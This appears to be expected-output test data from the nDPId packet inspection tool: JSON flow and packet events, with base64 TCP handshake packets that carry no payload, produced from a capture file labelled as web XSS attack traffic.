+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347762675,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347762675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U3VAAD4GclusEAABwKgKMuz6AFDBm6M8AAAAAKACchAbXAAAAgQFtAQCCAoBO\/BJAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":2,"flow_last_seen":1499347762675,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Proa5y3wZujPaAScSDRcwAAAgQFtAQCCAoD5cG+ATvwSQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6631,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":3,"flow_last_seen":1499347762676,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347762676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0U3ZAAD4GcmKsEAABwKgKMuz6AFDBm6M96GucuIAQAOVwewAAAQEICgE78EkD5cG+"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347765229,"flow_last_seen":1499347765229,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347765229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6651,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":1,"flow_last_seen":1499347765229,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oyZAAD4GIqqsEAABwKgKMu0UAFACp1HuAAAAAKACchApBgAAAgQFtAQCCAoBO\/LIAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6652,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":2,"flow_last_seen":1499347765230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347765230,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7RRH+ZWsAqdR76AScSCEHQAAAgQFtAQCCAoD5cQ8ATvyyAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6653,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_packet_id":3,"flow_last_seen":1499347765230,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347765230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oydAAD4GIrGsEAABwKgKMu0UAFACp1HvR\/mVrYAQAOUjJQAAAQEICgE78sgD5cQ8"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347766506,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347766506,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6660,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":1,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"ABm5CmnxAMGxFOsxCABFAAA80XFAAD4G9F6sEAABwKgKMu0iAFC65SV2AAAAAKACchCb8gAAAgQFtAQCCAoBO\/QHAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6661,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":2,"flow_last_seen":1499347766506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347766506,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7SI0\/7eouuUld6AScSDmxwAAAgQFtAQCCAoD5cV8ATv0BwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6662,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_packet_id":3,"flow_last_seen":1499347766507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347766507,"pkt":"ABm5CmnxAMGxFOsxCABFAAA00XJAAD4G9GWsEAABwKgKMu0iAFC65SV3NP+3qYAQAOWFzwAAAQEICgE79AcD5cV8"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347767793,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347767793,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6672,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":1,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sEFAAD4GFY+sEAABwKgKMu0wAFC7\/0UIAAAAAKACchB59gAAAgQFtAQCCAoBO\/VJAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6673,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":2,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347767793,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7TCCU6kzu\/9FCaAScSCEqwAAAgQFtAQCCAoD5ca9ATv1SQEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6674,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_packet_id":3,"flow_last_seen":1499347767793,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347767793,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sEJAAD4GFZasEAABwKgKMu0wAFC7\/0UJglOpNIAQAOUjswAAAQEICgE79UkD5ca9"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347769077,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347769077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6684,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":1,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8n3VAAD4GJlusEAABwKgKMu0+AFAozWn\/AAAAAKACchDm4gAAAgQFtAQCCAoBO\/aKAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":2,"flow_last_seen":1499347769077,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347769077,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7T59G4FkKM1qAKAScSAdXgAAAgQFtAQCCAoD5cf+ATv2igEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_packet_id":3,"flow_last_seen":1499347769078,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347769078,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0n3ZAAD4GJmKsEAABwKgKMu0+AFAozWoAfRuBZYAQAOW8ZQAAAQEICgE79ooD5cf+"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347770345,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347770345,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60748,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6693,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":1,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8anZAAD4GW1qsEAABwKgKMu1MAFBCsJ2xAAAAAKACchCYAgAAAgQFtAQCCAoBO\/fHAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6694,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":2,"flow_last_seen":1499347770345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347770345,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7UyjrEwnQrCdsqAScSDb7AAAAgQFtAQCCAoD5ck7ATv3xwEDAwc="} 
+00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6695,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":474,"flow_packet_id":3,"flow_last_seen":1499347770346,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347770346,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0andAAD4GW2GsEAABwKgKMu1MAFBCsJ2yo6xMKIAQAOV69AAAAQEICgE798cD5ck7"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347771635,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771635,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60762,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6705,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":1,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jzNAAD4GNp2sEAABwKgKMu1aAFBxsHY6AAAAAKACchCPKQAAAgQFtAQCCAoBO\/kJAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6706,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":2,"flow_last_seen":1499347771635,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347771635,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7VoJ3i\/mcbB2O6AScSCH4AAAAgQFtAQCCAoD5cp+ATv5CQEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6707,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":475,"flow_packet_id":3,"flow_last_seen":1499347771636,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347771636,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jzRAAD4GNqSsEAABwKgKMu1aAFBxsHY7Cd4v54AQAOUm6AAAAQEICgE7+QkD5cp+"} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347771832,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 